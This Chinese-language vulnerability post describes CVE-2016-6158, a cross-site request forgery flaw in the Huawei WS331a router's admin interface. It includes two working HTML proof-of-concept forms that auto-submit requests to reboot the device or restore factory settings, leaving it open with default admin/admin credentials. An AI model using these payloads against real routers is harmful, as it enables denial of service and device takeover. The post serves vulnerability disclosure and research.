(CVE-2016-6158)华为WS331a产品管理页面存在CSRF漏洞

admin 2022年1月5日01:17:51安全漏洞(CVE-2016-6158)华为WS331a产品管理页面存在CSRF漏洞已关闭评论26 views556字阅读1分51秒阅读模式

一、漏洞简介

HuaweiWS331a是中国华为(Huawei)公司的一款迷你无线路由器。使用WS331a-10V100R001C01B112之前版本软件的HuaweiWS331a路由器的管理界面存在跨站请求伪造漏洞。远程攻击者可通过提交特制的请求利用该漏洞恢复出厂设置或重启设备。

二、漏洞影响

WS331a-10 V100R001C02B017SP01及之前版本

三、复现过程

POC实现代码如下:

当管理员登陆后,打开如下poc页面,WS331a设备将重启。

1
2
3
<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>

当管理员登陆后,打开如下poc页面,WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点,并使用amdin/admin对设备进行管理控制。

1
2
3
<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日01:17:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  (CVE-2016-6158)华为WS331a产品管理页面存在CSRF漏洞 http://cn-sec.com/archives/718243.html